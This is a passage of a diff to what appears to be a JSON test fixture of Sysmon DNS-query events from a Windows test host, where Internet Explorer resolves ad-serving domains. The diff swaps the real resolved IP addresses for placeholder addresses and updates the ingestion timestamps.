5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:03.029Z",
@@ -3726,12 +3677,12 @@
 "type": "CNAME"
 },
 {
- "data": "23.52.162.21",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "23.52.162.21"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -3748,13 +3699,13 @@ "ssum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313783193Z", + "ingested": "2021-12-09T13:49:44.739249100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -3818,39 +3769,39 @@ "type": "CNAME" }, { - "data": "18.204.130.216", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.246.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "107.23.153.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.235.141.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.79.248", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.146.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.210.64.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.161.226", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3859,15 +3810,15 @@ } ], "resolved_ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, 
@@ -3884,22 +3835,15 @@ "protected-by.clarium.io" ], "ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313784367Z", + "ingested": "2021-12-09T13:49:44.739254900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -3963,12 +3907,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { 
@@ -3984,13 +3928,13 @@ "pagead2.googlesyndication.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313785772Z", + "ingested": "2021-12-09T13:49:44.739260700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4054,12 +3998,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { 
@@ -4075,13 +4019,13 @@ "googleads.g.doubleclick.net" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313787218Z", + "ingested": "2021-12-09T13:49:44.739266800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4149,47 +4093,47 @@ "type": "CNAME" }, { - "data": "52.22.184.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.30.174", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.70.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.158.57.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.6.39.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.113.251", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.8.28", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.215.246.105", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -4206,20 +4150,13 @@ "pixel.advertising.com" ], "ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313788773Z", + "ingested": "2021-12-09T13:49:44.739272600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4291,15 +4228,15 @@ "type": "CNAME" }, { - "data": "54.210.214.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.202.202.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4307,16 +4244,16 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -4334,17 +4271,16 @@ "onevideosync.uplynk.com" ], "ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313790203Z", + "ingested": "2021-12-09T13:49:44.739278400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
